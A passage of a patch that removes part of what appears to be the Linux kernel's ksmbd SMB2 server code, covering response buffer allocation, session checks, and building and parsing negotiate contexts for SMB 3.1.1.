+-	rsp_hdr->Id.SyncId.ProcessId = rcv_hdr->Id.SyncId.ProcessId;
+-	rsp_hdr->Id.SyncId.TreeId = rcv_hdr->Id.SyncId.TreeId;
+-	rsp_hdr->SessionId = rcv_hdr->SessionId;
+-	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
+-
+-	work->syncronous = true;
+-	if (work->async_id) {
+-		ksmbd_release_id(&conn->async_ida, work->async_id);
+-		work->async_id = 0;
+-	}
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_allocate_rsp_buf() - allocate smb2 response buffer
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0 on success, otherwise -ENOMEM
+- */
+-int smb2_allocate_rsp_buf(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+-	size_t small_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+-	size_t large_sz = small_sz + work->conn->vals->max_trans_size;
+-	size_t sz = small_sz;
+-	int cmd = le16_to_cpu(hdr->Command);
+-
+-	if (cmd == SMB2_IOCTL_HE || cmd == SMB2_QUERY_DIRECTORY_HE)
+-		sz = large_sz;
+-
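+-	/* EA, all-information and security queries can exceed the small buffer */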
+-	if (cmd == SMB2_QUERY_INFO_HE) {
+-		struct smb2_query_info_req *req;
+-
+-		req = smb2_get_msg(work->request_buf);
+-		if ((req->InfoType == SMB2_O_INFO_FILE &&
+-		     (req->FileInfoClass == FILE_FULL_EA_INFORMATION ||
+-		     req->FileInfoClass == FILE_ALL_INFORMATION)) ||
+-		    req->InfoType == SMB2_O_INFO_SECURITY)
+-			sz = large_sz;
+-	}
+-
+-	/* allocate large response buf for chained commands */
+-	if (le32_to_cpu(hdr->NextCommand) > 0)
+-		sz = large_sz;
+-
+-	work->response_buf = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
+-	if (!work->response_buf)
+-		return -ENOMEM;
+-
+-	work->response_sz = sz;
+-	return 0;
+-}
+-
+-/**
+- * smb2_check_user_session() - check for valid session for a user
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      1 if a valid user session is found, 0 if the command does
+- *              not require a session, otherwise error
+- */
+-int smb2_check_user_session(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
+-	struct ksmbd_conn *conn = work->conn;
+-	unsigned int cmd = conn->ops->get_cmd_val(work);
+-	unsigned long long sess_id;
+-
+-	work->sess = NULL;
+-	/*
+-	 * The SMB2_ECHO, SMB2_NEGOTIATE and SMB2_SESSION_SETUP commands do
+-	 * not require a session id, so there is no need to validate the
+-	 * user session for these commands.
+-	 */
+-	if (cmd == SMB2_ECHO_HE || cmd == SMB2_NEGOTIATE_HE ||
+-	    cmd == SMB2_SESSION_SETUP_HE)
+-		return 0;
+-
+-	if (!ksmbd_conn_good(conn))
+-		return -EINVAL;
+-
+-	sess_id = le64_to_cpu(req_hdr->SessionId);
+-	/* Check for validity of user session */
+-	work->sess = ksmbd_session_lookup_all(conn, sess_id);
+-	if (work->sess)
+-		return 1;
+-	ksmbd_debug(SMB, "Invalid user session, Uid %llu\n", sess_id);
+-	return -EINVAL;
+-}
+-
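+-/*
+- * If a client re-authenticates with the same account name and password,
+- * expire its previous session and mark the channels bound to it as exiting.
+- */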
+-static void destroy_previous_session(struct ksmbd_conn *conn,
+-				     struct ksmbd_user *user, u64 id)
+-{
+-	struct ksmbd_session *prev_sess = ksmbd_session_lookup_slowpath(id);
+-	struct ksmbd_user *prev_user;
+-	struct channel *chann;
+-	long index;
+-
+-	if (!prev_sess)
+-		return;
+-
+-	prev_user = prev_sess->user;
+-
+-	if (!prev_user ||
+-	    strcmp(user->name, prev_user->name) ||
+-	    user->passkey_sz != prev_user->passkey_sz ||
+-	    memcmp(user->passkey, prev_user->passkey, user->passkey_sz))
+-		return;
+-
+-	prev_sess->state = SMB2_SESSION_EXPIRED;
+-	xa_for_each(&prev_sess->ksmbd_chann_list, index, chann)
+-		ksmbd_conn_set_exiting(chann->conn);
+-}
+-
+-/**
+- * smb2_get_name() - get filename string from the on-the-wire smb format
+- * @src:	source buffer
+- * @maxlen:	maximum length of the source string
+- * @local_nls:	nls_table pointer
+- *
+- * Return:      matching converted filename on success, otherwise error ptr
+- */
+-static char *
+-smb2_get_name(const char *src, const int maxlen, struct nls_table *local_nls)
+-{
+-	char *name;
+-
+-	name = smb_strndup_from_utf16(src, maxlen, 1, local_nls);
+-	if (IS_ERR(name)) {
+-		pr_err("failed to get name %ld\n", PTR_ERR(name));
+-		return name;
+-	}
+-
+-	ksmbd_conv_path_to_unix(name);
+-	ksmbd_strip_last_slash(name);
+-	return name;
+-}
+-
+-int setup_async_work(struct ksmbd_work *work, void (*fn)(void **), void **arg)
+-{
+-	struct smb2_hdr *rsp_hdr;
+-	struct ksmbd_conn *conn = work->conn;
+-	int id;
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	rsp_hdr->Flags |= SMB2_FLAGS_ASYNC_COMMAND;
+-
+-	id = ksmbd_acquire_async_msg_id(&conn->async_ida);
+-	if (id < 0) {
+-		pr_err("Failed to alloc async message id\n");
+-		return id;
+-	}
+-	work->syncronous = false;
+-	work->async_id = id;
+-	rsp_hdr->Id.AsyncId = cpu_to_le64(id);
+-
+-	ksmbd_debug(SMB,
+-		    "Send interim Response to inform async request id : %d\n",
+-		    work->async_id);
+-
+-	work->cancel_fn = fn;
+-	work->cancel_argv = arg;
+-
+-	if (list_empty(&work->async_request_entry)) {
+-		spin_lock(&conn->request_lock);
+-		list_add_tail(&work->async_request_entry, &conn->async_requests);
+-		spin_unlock(&conn->request_lock);
+-	}
+-
+-	return 0;
+-}
+-
+-void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status)
+-{
+-	struct smb2_hdr *rsp_hdr;
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	smb2_set_err_rsp(work);
+-	rsp_hdr->Status = status;
+-
+-	work->multiRsp = 1;
+-	ksmbd_conn_write(work);
+-	rsp_hdr->Status = 0;
+-	work->multiRsp = 0;
+-}
+-
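+-/* Map special inode types to the reparse tags used for WSL special files. */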
+-static __le32 smb2_get_reparse_tag_special_file(umode_t mode)
+-{
+-	if (S_ISDIR(mode) || S_ISREG(mode))
+-		return 0;
+-
+-	if (S_ISLNK(mode))
+-		return IO_REPARSE_TAG_LX_SYMLINK_LE;
+-	else if (S_ISFIFO(mode))
+-		return IO_REPARSE_TAG_LX_FIFO_LE;
+-	else if (S_ISSOCK(mode))
+-		return IO_REPARSE_TAG_AF_UNIX_LE;
+-	else if (S_ISCHR(mode))
+-		return IO_REPARSE_TAG_LX_CHR_LE;
+-	else if (S_ISBLK(mode))
+-		return IO_REPARSE_TAG_LX_BLK_LE;
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_get_dos_mode() - get file mode in dos format from unix mode
+- * @stat:	kstat containing file mode
+- * @attribute:	attribute flags
+- *
+- * Return:      converted dos mode
+- */
+-static int smb2_get_dos_mode(struct kstat *stat, int attribute)
+-{
+-	int attr = 0;
+-
+-	if (S_ISDIR(stat->mode)) {
+-		attr = FILE_ATTRIBUTE_DIRECTORY |
+-			(attribute & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM));
+-	} else {
+-		attr = (attribute & 0x00005137) | FILE_ATTRIBUTE_ARCHIVE;
+-		attr &= ~(FILE_ATTRIBUTE_DIRECTORY);
+-		if (S_ISREG(stat->mode) && (server_conf.share_fake_fscaps &
+-				FILE_SUPPORTS_SPARSE_FILES))
+-			attr |= FILE_ATTRIBUTE_SPARSE_FILE;
+-
+-		if (smb2_get_reparse_tag_special_file(stat->mode))
+-			attr |= FILE_ATTRIBUTE_REPARSE_POINT;
+-	}
+-
+-	return attr;
+-}
+-
+-static void build_preauth_ctxt(struct smb2_preauth_neg_context *pneg_ctxt,
+-			       __le16 hash_id)
+-{
+-	pneg_ctxt->ContextType = SMB2_PREAUTH_INTEGRITY_CAPABILITIES;
+-	pneg_ctxt->DataLength = cpu_to_le16(38);
+-	pneg_ctxt->HashAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->SaltLength = cpu_to_le16(SMB311_SALT_SIZE);
+-	get_random_bytes(pneg_ctxt->Salt, SMB311_SALT_SIZE);
+-	pneg_ctxt->HashAlgorithms = hash_id;
+-}
+-
+-static void build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt,
+-			       __le16 cipher_type)
+-{
+-	pneg_ctxt->ContextType = SMB2_ENCRYPTION_CAPABILITIES;
+-	pneg_ctxt->DataLength = cpu_to_le16(4);
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->CipherCount = cpu_to_le16(1);
+-	pneg_ctxt->Ciphers[0] = cipher_type;
+-}
+-
+-static void build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt,
+-				   __le16 comp_algo)
+-{
+-	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
+-	pneg_ctxt->DataLength =
+-		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
+-			- sizeof(struct smb2_neg_context));
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->Flags = cpu_to_le32(0);
+-	pneg_ctxt->CompressionAlgorithms[0] = comp_algo;
+-}
+-
+-static void build_sign_cap_ctxt(struct smb2_signing_capabilities *pneg_ctxt,
+-				__le16 sign_algo)
+-{
+-	pneg_ctxt->ContextType = SMB2_SIGNING_CAPABILITIES;
+-	pneg_ctxt->DataLength =
+-		cpu_to_le16((sizeof(struct smb2_signing_capabilities) + 2)
+-			- sizeof(struct smb2_neg_context));
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->SigningAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->SigningAlgorithms[0] = sign_algo;
+-}
+-
+-static void build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_POSIX_EXTENSIONS_AVAILABLE;
+-	pneg_ctxt->DataLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
+-	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
+-	pneg_ctxt->Name[0] = 0x93;
+-	pneg_ctxt->Name[1] = 0xAD;
+-	pneg_ctxt->Name[2] = 0x25;
+-	pneg_ctxt->Name[3] = 0x50;
+-	pneg_ctxt->Name[4] = 0x9C;
+-	pneg_ctxt->Name[5] = 0xB4;
+-	pneg_ctxt->Name[6] = 0x11;
+-	pneg_ctxt->Name[7] = 0xE7;
+-	pneg_ctxt->Name[8] = 0xB4;
+-	pneg_ctxt->Name[9] = 0x23;
+-	pneg_ctxt->Name[10] = 0x83;
+-	pneg_ctxt->Name[11] = 0xDE;
+-	pneg_ctxt->Name[12] = 0x96;
+-	pneg_ctxt->Name[13] = 0x8B;
+-	pneg_ctxt->Name[14] = 0xCD;
+-	pneg_ctxt->Name[15] = 0x7C;
+-}
+-
+-static void assemble_neg_contexts(struct ksmbd_conn *conn,
+-				  struct smb2_negotiate_rsp *rsp,
+-				  void *smb2_buf_len)
+-{
+-	char *pneg_ctxt = (char *)rsp +
+-			le32_to_cpu(rsp->NegotiateContextOffset);
+-	int neg_ctxt_cnt = 1;
+-	int ctxt_size;
+-
+-	ksmbd_debug(SMB,
+-		    "assemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
+-	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt,
+-			   conn->preauth_info->Preauth_HashId);
+-	rsp->NegotiateContextCount = cpu_to_le16(neg_ctxt_cnt);
+-	inc_rfc1001_len(smb2_buf_len, AUTH_GSS_PADDING);
+-	ctxt_size = sizeof(struct smb2_preauth_neg_context);
+-	/* Round to 8 byte boundary */
+-	pneg_ctxt += round_up(sizeof(struct smb2_preauth_neg_context), 8);
+-
+-	if (conn->cipher_type) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_ENCRYPTION_CAPABILITIES context\n");
+-		build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt,
+-				   conn->cipher_type);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_encryption_neg_context) + 2;
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt +=
+-			round_up(sizeof(struct smb2_encryption_neg_context) + 2,
+-				 8);
+-	}
+-
+-	if (conn->compress_algorithm) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_COMPRESSION_CAPABILITIES context\n");
+-		/* Temporarily set to SMB3_COMPRESS_NONE */
+-		build_compression_ctxt((struct smb2_compression_capabilities_context *)pneg_ctxt,
+-				       conn->compress_algorithm);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_compression_capabilities_context) + 2;
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt += round_up(sizeof(struct smb2_compression_capabilities_context) + 2,
+-				      8);
+-	}
+-
+-	if (conn->posix_ext_supported) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
+-		build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_posix_neg_context);
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt += round_up(sizeof(struct smb2_posix_neg_context), 8);
+-	}
+-
+-	if (conn->signing_negotiated) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_SIGNING_CAPABILITIES context\n");
+-		build_sign_cap_ctxt((struct smb2_signing_capabilities *)pneg_ctxt,
+-				    conn->signing_algorithm);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_signing_capabilities) + 2;
+-	}
+-
+-	inc_rfc1001_len(smb2_buf_len, ctxt_size);
+-}
+-
+-static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+-				  struct smb2_preauth_neg_context *pneg_ctxt,
+-				  int ctxt_len)
+-{
+-	/*
+-	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
+-	 * which may not be present. Only check the HashAlgorithms[]
+-	 * entry that is actually used.
+-	 */
+-	if (ctxt_len <
+-	    sizeof(struct smb2_neg_context) + MIN_PREAUTH_CTXT_DATA_LEN)
+-		return STATUS_INVALID_PARAMETER;
+-
+-	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
+-		return STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
+-
+-	conn->preauth_info->Preauth_HashId = SMB2_PREAUTH_INTEGRITY_SHA512;
+-	return STATUS_SUCCESS;
+-}
+-
+-static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+-				struct smb2_encryption_neg_context *pneg_ctxt,
+-				int ctxt_len)
+-{
+-	int cph_cnt;
+-	int i, cphs_size;
+-
+-	if (sizeof(struct smb2_encryption_neg_context) > ctxt_len) {
+-		pr_err("Invalid SMB2_ENCRYPTION_CAPABILITIES context size\n");
+-		return;
+-	}
+-
+-	conn->cipher_type = 0;
+-
+-	cph_cnt = le16_to_cpu(pneg_ctxt->CipherCount);
+-	cphs_size = cph_cnt * sizeof(__le16);
+-
+-	if (sizeof(struct smb2_encryption_neg_context) + cphs_size >
+-	    ctxt_len) {
+-		pr_err("Invalid cipher count(%d)\n", cph_cnt);
+-		return;
+-	}
+-
+-	if (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION))
+-		return;
+-
+-	for (i = 0; i < cph_cnt; i++) {
+-		if (pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES128_GCM ||
+-		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES128_CCM ||
+-		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES256_CCM ||
+-		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES256_GCM) {
+-			ksmbd_debug(SMB, "Cipher ID = 0x%x\n",
+-				    pneg_ctxt->Ciphers[i]);
+-			conn->cipher_type = pneg_ctxt->Ciphers[i];
+-			break;
+-		}
+-	}
+-}
+-
+-/**
+- * smb3_encryption_negotiated() - checks if server and client agreed on enabling encryption
+- * @conn:	smb connection
+- *
+- * Return:	true if connection should be encrypted, else false
+- */
+-bool smb3_encryption_negotiated(struct ksmbd_conn *conn)
+-{
+-	if (!conn->ops->generate_encryptionkey)
+-		return false;
+-
+-	/*
+-	 * SMB 3.0 and 3.0.2 dialects use the SMB2_GLOBAL_CAP_ENCRYPTION flag.
+-	 * SMB 3.1.1 uses the cipher_type field.
+-	 */
+-	return (conn->vals->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION) ||
+-	    conn->cipher_type;
+-}
+-
+-static void decode_compress_ctxt(struct ksmbd_conn *conn,
+-				 struct smb2_compression_capabilities_context *pneg_ctxt)
+-{
+-	conn->compress_algorithm = SMB3_COMPRESS_NONE;
+-}
+-
+-static void decode_sign_cap_ctxt(struct ksmbd_conn *conn,
+-				 struct smb2_signing_capabilities *pneg_ctxt,
+-				 int ctxt_len)
+-{
+-	int sign_algo_cnt;
+-	int i, sign_alos_size;
+-
+-	if (sizeof(struct smb2_signing_capabilities) > ctxt_len) {
+-		pr_err("Invalid SMB2_SIGNING_CAPABILITIES context length\n");
+-		return;
+-	}
+-
+-	conn->signing_negotiated = false;
+-	sign_algo_cnt = le16_to_cpu(pneg_ctxt->SigningAlgorithmCount);
+-	sign_alos_size = sign_algo_cnt * sizeof(__le16);
+-
+-	if (sizeof(struct smb2_signing_capabilities) + sign_alos_size >
+-	    ctxt_len) {
+-		pr_err("Invalid signing algorithm count(%d)\n", sign_algo_cnt);
+-		return;
+-	}
+-
+-	for (i = 0; i < sign_algo_cnt; i++) {
+-		if (pneg_ctxt->SigningAlgorithms[i] == SIGNING_ALG_HMAC_SHA256_LE ||
+-		    pneg_ctxt->SigningAlgorithms[i] == SIGNING_ALG_AES_CMAC_LE) {
+-			ksmbd_debug(SMB, "Signing Algorithm ID = 0x%x\n",
+-				    pneg_ctxt->SigningAlgorithms[i]);
+-			conn->signing_negotiated = true;
+-			conn->signing_algorithm =
+-				pneg_ctxt->SigningAlgorithms[i];
+-			break;
+-		}
+-	}
+-}
+-
+-static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+-				      struct smb2_negotiate_req *req,
+-				      unsigned int len_of_smb)
+-{
+-	/* +4 is to account for the RFC1001 len field */
+-	struct smb2_neg_context *pctx = (struct smb2_neg_context *)req;
+-	int i = 0, len_of_ctxts;
+-	unsigned int offset = le32_to_cpu(req->NegotiateContextOffset);
+-	unsigned int neg_ctxt_cnt = le16_to_cpu(req->NegotiateContextCount);
+-	__le32 status = STATUS_INVALID_PARAMETER;
+-
+-	ksmbd_debug(SMB, "decoding %d negotiate contexts\n", neg_ctxt_cnt);
+-	if (len_of_smb <= offset) {
+-		ksmbd_debug(SMB, "Invalid response: negotiate context offset\n");
+-		return status;
+-	}
+-
+-	len_of_ctxts = len_of_smb - offset;
+-
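+-	/*
+-	 * On the first iteration 'offset' is NegotiateContextOffset relative
+-	 * to the request; afterwards it is the 8-byte aligned size of the
+-	 * previous context.
+-	 */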
+-	while (i++ < neg_ctxt_cnt) {
+-		int clen, ctxt_len;
+-
+-		if (len_of_ctxts < (int)sizeof(struct smb2_neg_context))
+-			break;
+-
+-		pctx = (struct smb2_neg_context *)((char *)pctx + offset);
+-		clen = le16_to_cpu(pctx->DataLength);
+-		ctxt_len = clen + sizeof(struct smb2_neg_context);
+-
+-		if (ctxt_len > len_of_ctxts)
+-			break;
+-
+-		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
+-			if (conn->preauth_info->Preauth_HashId)
+-				break;
+-
+-			status = decode_preauth_ctxt(conn,
+-						     (struct smb2_preauth_neg_context *)pctx,
+-						     ctxt_len);
+-			if (status != STATUS_SUCCESS)
+-				break;
+-		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_ENCRYPTION_CAPABILITIES context\n");
+-			if (conn->cipher_type)
+-				break;
+-
+-			decode_encrypt_ctxt(conn,
+-					    (struct smb2_encryption_neg_context *)pctx,
+-					    ctxt_len);
+-		} else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_COMPRESSION_CAPABILITIES context\n");
+-			if (conn->compress_algorithm)
+-				break;
+-
+-			decode_compress_ctxt(conn,
+-					     (struct smb2_compression_capabilities_context *)pctx);
+-		} else if (pctx->ContextType == SMB2_NETNAME_NEGOTIATE_CONTEXT_ID) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_NETNAME_NEGOTIATE_CONTEXT_ID context\n");
+-		} else if (pctx->ContextType == SMB2_POSIX_EXTENSIONS_AVAILABLE) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
+-			conn->posix_ext_supported = true;
+-		} else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_SIGNING_CAPABILITIES context\n");
+-
+-			decode_sign_cap_ctxt(conn,
+-					     (struct smb2_signing_capabilities *)pctx,
+-					     ctxt_len);
+-		}
+-
+-		/* offsets must be 8 byte aligned */
+-		offset = (ctxt_len + 7) & ~0x7;
+-		len_of_ctxts -= offset;
+-	}
+-	return status;
+-}
+-
+-/**
+- * smb2_handle_negotiate() - handler for smb2 negotiate command
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-int smb2_handle_negotiate(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_negotiate_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_negotiate_rsp *rsp = smb2_get_msg(work->response_buf);
+-	int rc = 0;
+-	unsigned int smb2_buf_len, smb2_neg_size;
+-	__le32 status;
+-
+-	ksmbd_debug(SMB, "Received negotiate request\n");
+-	conn->need_neg = false;
+-	if (ksmbd_conn_good(conn)) {
+-		pr_err("conn->tcp_status is already in CifsGood State\n");
+-		work->send_no_response = 1;
+-		return rc;
+-	}
+-
+-	smb2_buf_len = get_rfc1002_len(work->request_buf);
+-	smb2_neg_size = offsetof(struct smb2_negotiate_req, Dialects);
+-	if (smb2_neg_size > smb2_buf_len) {
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		rc = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (req->DialectCount == 0) {
+-		pr_err("malformed packet\n");
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		rc = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (conn->dialect == SMB311_PROT_ID) {
+-		unsigned int nego_ctxt_off = le32_to_cpu(req->NegotiateContextOffset);
+-
+-		if (smb2_buf_len < nego_ctxt_off) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			rc = -EINVAL;
+-			goto err_out;
+-		}
+-
+-		if (smb2_neg_size > nego_ctxt_off) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			rc = -EINVAL;
+-			goto err_out;
+-		}
+-
+-		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
+-		    nego_ctxt_off) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			rc = -EINVAL;
+-			goto err_out;
+-		}
+-	} else {
+-		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
+-		    smb2_buf_len) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			rc = -EINVAL;
+-			goto err_out;
+-		}
+-	}
+-
+-	conn->cli_cap = le32_to_cpu(req->Capabilities);
+-	switch (conn->dialect) {
+-	case SMB311_PROT_ID:
+-		conn->preauth_info =
+-			kzalloc(sizeof(struct preauth_integrity_info),
+-				GFP_KERNEL);
+-		if (!conn->preauth_info) {
+-			rc = -ENOMEM;
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			goto err_out;
+-		}
+-
+-		status = deassemble_neg_contexts(conn, req,
+-						 get_rfc1002_len(work->request_buf));
+-		if (status != STATUS_SUCCESS) {
+-			pr_err("deassemble_neg_contexts error(0x%x)\n",
+-			       status);
+-			rsp->hdr.Status = status;
+-			rc = -EINVAL;
+-			kfree(conn->preauth_info);
+-			conn->preauth_info = NULL;
+-			goto err_out;
+-		}
+-
+-		rc = init_smb3_11_server(conn);
+-		if (rc < 0) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			kfree(conn->preauth_info);
+-			conn->preauth_info = NULL;
+-			goto err_out;
+-		}
+-
+-		ksmbd_gen_preauth_integrity_hash(conn,
+-						 work->request_buf,
+-						 conn->preauth_info->Preauth_HashValue);
+-		rsp->NegotiateContextOffset =
+-				cpu_to_le32(OFFSET_OF_NEG_CONTEXT);
+-		assemble_neg_contexts(conn, rsp, work->response_buf);
+-		break;
+-	case SMB302_PROT_ID:
+-		init_smb3_02_server(conn);
+-		break;
+-	case SMB30_PROT_ID:
+-		init_smb3_0_server(conn);
+-		break;
+-	case SMB21_PROT_ID:
+-		init_smb2_1_server(conn);
+-		break;
+-	case SMB2X_PROT_ID:
+-	case BAD_PROT_ID:
+-	default:
+-		ksmbd_debug(SMB, "Server dialect :0x%x not supported\n",
+-			    conn->dialect);
+-		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-		rc = -EINVAL;
+-		goto err_out;
+-	}
+-	rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
+-
+-	/* For stats */
+-	conn->connection_type = conn->dialect;
+-
+-	rsp->MaxTransactSize = cpu_to_le32(conn->vals->max_trans_size);
+-	rsp->MaxReadSize = cpu_to_le32(conn->vals->max_read_size);
+-	rsp->MaxWriteSize = cpu_to_le32(conn->vals->max_write_size);
+-
+-	memcpy(conn->ClientGUID, req->ClientGUID,
+-			SMB2_CLIENT_GUID_SIZE);
+-	conn->cli_sec_mode = le16_to_cpu(req->SecurityMode);
+-
+-	rsp->StructureSize = cpu_to_le16(65);
+-	rsp->DialectRevision = cpu_to_le16(conn->dialect);
+-	/* Not setting conn guid rsp->ServerGUID, as it is
+-	 * not used by the client for identifying the server
+-	 */
+-	memset(rsp->ServerGUID, 0, SMB2_CLIENT_GUID_SIZE);
+-
+-	rsp->SystemTime = cpu_to_le64(ksmbd_systime());
+-	rsp->ServerStartTime = 0;
+-	ksmbd_debug(SMB, "negotiate context offset %d, count %d\n",
+-		    le32_to_cpu(rsp->NegotiateContextOffset),
+-		    le16_to_cpu(rsp->NegotiateContextCount));
+-
+-	rsp->SecurityBufferOffset = cpu_to_le16(128);
+-	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
+-	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
+-				  le16_to_cpu(rsp->SecurityBufferOffset));
+-	inc_rfc1001_len(work->response_buf, sizeof(struct smb2_negotiate_rsp) -
+-			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
+-			 AUTH_GSS_LENGTH);
+-	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
+-	conn->use_spnego = true;
+-
+-	if ((server_conf.signing == KSMBD_CONFIG_OPT_AUTO ||
+-	     server_conf.signing == KSMBD_CONFIG_OPT_DISABLED) &&
+-	    req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED_LE)
+-		conn->sign = true;
+-	else if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY) {
+-		server_conf.enforced_signing = true;
+-		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+-		conn->sign = true;
+-	}
+-
+-	conn->srv_sec_mode = le16_to_cpu(rsp->SecurityMode);
+-	ksmbd_conn_set_need_negotiate(conn);
+-
+-err_out:
+-	if (rc < 0)
+-		smb2_set_err_rsp(work);
+-
+-	return rc;
+-}
+-
+-static int alloc_preauth_hash(struct ksmbd_session *sess,
+-			      struct ksmbd_conn *conn)
+-{
+-	if (sess->Preauth_HashValue)
+-		return 0;
+-
+-	sess->Preauth_HashValue = kmemdup(conn->preauth_info->Preauth_HashValue,
+-					  PREAUTH_HASHVALUE_SIZE, GFP_KERNEL);
+-	if (!sess->Preauth_HashValue)
+-		return -ENOMEM;
+-
+-	return 0;
+-}
+-
+-static int generate_preauth_hash(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	u8 *preauth_hash;
+-
+-	if (conn->dialect != SMB311_PROT_ID)
+-		return 0;
+-
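+-	/*
+-	 * For channel binding, the preauth hash is tracked in a per-session
+-	 * preauth_session on this connection rather than on the session
+-	 * itself.
+-	 */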
+-	if (conn->binding) {
+-		struct preauth_session *preauth_sess;
+-
+-		preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
+-		if (!preauth_sess) {
